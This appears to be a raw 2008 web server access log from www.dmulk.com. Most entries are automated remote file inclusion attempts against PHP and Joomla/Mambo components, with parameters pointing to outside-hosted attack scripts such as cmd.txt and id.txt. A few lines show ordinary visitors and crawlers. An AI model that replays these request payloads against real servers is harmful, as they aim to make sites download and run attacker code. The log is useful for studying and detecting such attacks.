64.118.85.129 - - [26/Feb/2008:08:50:59 -0800] "GET /logs/access_080131.log//squirrelcart/cart_content.php?cart_isp_root=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:08:51:00 -0800] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:08:51:00 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.113.19.8 - - [26/Feb/2008:08:51:06 -0800] "GET /funny/ HTTP/1.1" 200 808 "http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=all&q=&itag=crv&l=en&ics=utf-8&cs=utf8&wf%5Bn%5D=3&wf%5B0%5D%5Br%5D=%2B&wf%5B0%5D%5Bq%5D=index+of&wf%5B0%5D%5Bw%5D=title&wf%5B1%5D%5Br%5D=%2B&wf%5B1%5D%5Bq%5D=funny&wf%5B1%5D%5Bw%5D=title&wf%5B2%5D%5Br%5D=-&wf%5B2%5D%5Bq%5D=.flv&wf%5B2%5D%5Bw%5D=&dincl=&dexcl=&geo=&doctype=&dfr%5Bd%5D=1&dfr%5Bm%5D=1&dfr%5By%5D=1980&dto%5Bd%5D=26&dto%5Bm%5D=2&dto%5By%5D=2008&hits=10" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
204.113.19.8 - - [26/Feb/2008:08:51:14 -0800] "GET /funny/terryt1.wmv HTTP/1.1" 304 - "-" "NSPlayer/9.0.0.3250" "www.dmulk.com"
204.113.19.8 - - [26/Feb/2008:08:51:14 -0800] "GET /funny/terryt1.wmv HTTP/1.1" 304 - "-" "NSPlayer/9.0.0.3267 WMFSDK/9.0" "www.dmulk.com"
204.113.19.8 - - [26/Feb/2008:08:51:15 -0800] "GET /funny/terryt1.wmv HTTP/1.1" 200 4065346 "http://www.dmulk.com/funny/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
83.149.90.29 - - [26/Feb/2008:08:51:49 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
83.149.90.29 - - [26/Feb/2008:08:51:49 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
204.113.19.8 - - [26/Feb/2008:08:51:53 -0800] "GET /funny/terryt1.wmv HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
204.113.19.8 - - [26/Feb/2008:08:51:57 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.1" 304 - "-" "Windows-Media-Player/9.00.00.3354" "www.dmulk.com"
204.113.19.8 - - [26/Feb/2008:08:51:57 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.1" 304 - "-" "NSPlayer/9.0.0.3250" "www.dmulk.com"
204.113.19.8 - - [26/Feb/2008:08:51:57 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.1" 304 - "-" "NSPlayer/9.0.0.3267 WMFSDK/9.0" "www.dmulk.com"
204.113.19.8 - - [26/Feb/2008:08:51:58 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.1" 200 817843 "http://www.dmulk.com/funny/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:08:52:07 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:08:52:07 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
67.28.112.245 - - [26/Feb/2008:08:52:13 -0800] "GET /Inc/cmses/aedatingCMS.php?dir[inc]=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.245 - - [26/Feb/2008:08:52:13 -0800] "GET /Inc/cmses/aedatingCMS.php?dir[inc]=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.234.68.78 - - [26/Feb/2008:08:52:22 -0800] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.68.78 - - [26/Feb/2008:08:52:22 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.68.78 - - [26/Feb/2008:08:52:23 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:08:52:33 -0800] "GET /logs/access_080128.log/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:08:53:08 -0800] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:08:53:08 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:08:53:09 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:08:53:23 -0800] "GET /logs/access.log/lang=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:08:53:23 -0800] "GET /lang=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:08:53:23 -0800] "GET /logs/lang=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.135.109.228 - - [26/Feb/2008:08:53:27 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:08:53:34 -0800] "GET /logs/access_080201.log/lang=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [26/Feb/2008:08:53:39 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [26/Feb/2008:08:53:39 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [26/Feb/2008:08:53:39 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:08:53:48 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:08:53:48 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:08:53:49 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [26/Feb/2008:08:53:53 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
89.218.85.18 - - [26/Feb/2008:08:53:53 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
212.67.202.19 - - [26/Feb/2008:08:53:57 -0800] "GET /logs/access_080126.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ppunet.com/cache/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:08:54:23 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:08:54:24 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:08:54:24 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:08:54:37 -0800] "GET /Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:08:54:37 -0800] "GET /Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.1.132.59 - - [26/Feb/2008:08:54:59 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.6.23.139 - - [26/Feb/2008:08:55:06 -0800] "GET /minamijewelry/kanji1.psd HTTP/1.0" 200 515148 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.203.196.55 - - [26/Feb/2008:08:55:38 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.203.196.55 - - [26/Feb/2008:08:55:38 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.203.196.55 - - [26/Feb/2008:08:55:38 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.222.13.22 - - [26/Feb/2008:08:55:49 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.222.13.22 - - [26/Feb/2008:08:55:50 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.222.13.22 - - [26/Feb/2008:08:55:50 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:08:55:54 -0800] "GET /logs/access_080122.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:08:55:54 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:08:55:54 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.209.112.115 - - [26/Feb/2008:08:56:07 -0800] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:08:56:34 -0800] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.63.220.22 - - [26/Feb/2008:08:56:40 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.191.85.7 - - [26/Feb/2008:08:56:49 -0800] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.191.85.7 - - [26/Feb/2008:08:56:53 -0800] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.191.85.7 - - [26/Feb/2008:08:56:53 -0800] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.28.112.245 - - [26/Feb/2008:08:57:07 -0800] "GET /logs/access_071118.log/Inc/cmses/aedatingCMS.php?dir[inc]=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.245 - - [26/Feb/2008:08:57:07 -0800] "GET /Inc/cmses/aedatingCMS.php?dir[inc]=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.245 - - [26/Feb/2008:08:57:08 -0800] "GET /logs/Inc/cmses/aedatingCMS.php?dir[inc]=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:08:57:08 -0800] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:08:57:08 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:08:57:12 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
84.53.83.254 - - [26/Feb/2008:08:57:17 -0800] "GET //embed/day.php?path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
84.53.83.254 - - [26/Feb/2008:08:57:18 -0800] "GET /logs//embed/day.php?path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:08:57:49 -0800] "GET /logs/access_080118.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:08:57:49 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:08:57:49 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:57:52 -0800] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:57:53 -0800] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:08:57:53 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:08:58:03 -0800] "GET /logs/access_080120.log/Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:08:58:08 -0800] "GET /Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:08:58:10 -0800] "GET /logs/access_080120.log/Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:08:58:16 -0800] "GET /logs/Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:08:58:18 -0800] "GET /Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:08:58:19 -0800] "GET /logs/Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:08:58:47 -0800] "GET /logs/access_080108.log/Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:08:58:49 -0800] "GET /logs/access_080108.log/Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.48 - - [26/Feb/2008:08:59:30 -0800] "GET /logs/access_071006.log HTTP/1.0" 200 58327 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.89.97 - - [26/Feb/2008:08:59:30 -0800] "GET /?action=logout&siteurl=http://suwung.890m.com/test.txt??? HTTP/1.1" 200 3094 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.29.89.97 - - [26/Feb/2008:08:59:32 -0800] "GET /logs/?action=logout&siteurl=http://suwung.890m.com/test.txt??? HTTP/1.1" 200 36259 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.6.8.125 - - [26/Feb/2008:08:59:48 -0800] "GET /minamijewelry/flower.psd HTTP/1.0" 200 109558 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:09:00:20 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:09:00:21 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:09:00:21 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:09:00:31 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.135.109.228 - - [26/Feb/2008:09:00:32 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.79.168.42 - - [26/Feb/2008:09:00:47 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [26/Feb/2008:09:00:52 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.82.118.62 - - [26/Feb/2008:09:00:53 -0800] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.209.112.115 - - [26/Feb/2008:09:00:57 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.168.42 - - [26/Feb/2008:09:01:20 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:09:01:36 -0800] "GET /index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:09:02:21 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:09:02:22 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [26/Feb/2008:09:02:22 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://preciousland.co.uk//////templates/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.74.90 - - [26/Feb/2008:09:02:25 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.74.90 - - [26/Feb/2008:09:02:25 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.236.198 - - [26/Feb/2008:09:02:46 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://images.torrentmove.com/iv/osrun.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
203.86.236.198 - - [26/Feb/2008:09:02:47 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://images.torrentmove.com/iv/osrun.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
74.6.23.231 - - [26/Feb/2008:09:03:45 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
196.35.158.180 - - [26/Feb/2008:09:03:55 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.35.158.180 - - [26/Feb/2008:09:03:57 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.35.158.180 - - [26/Feb/2008:09:03:59 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
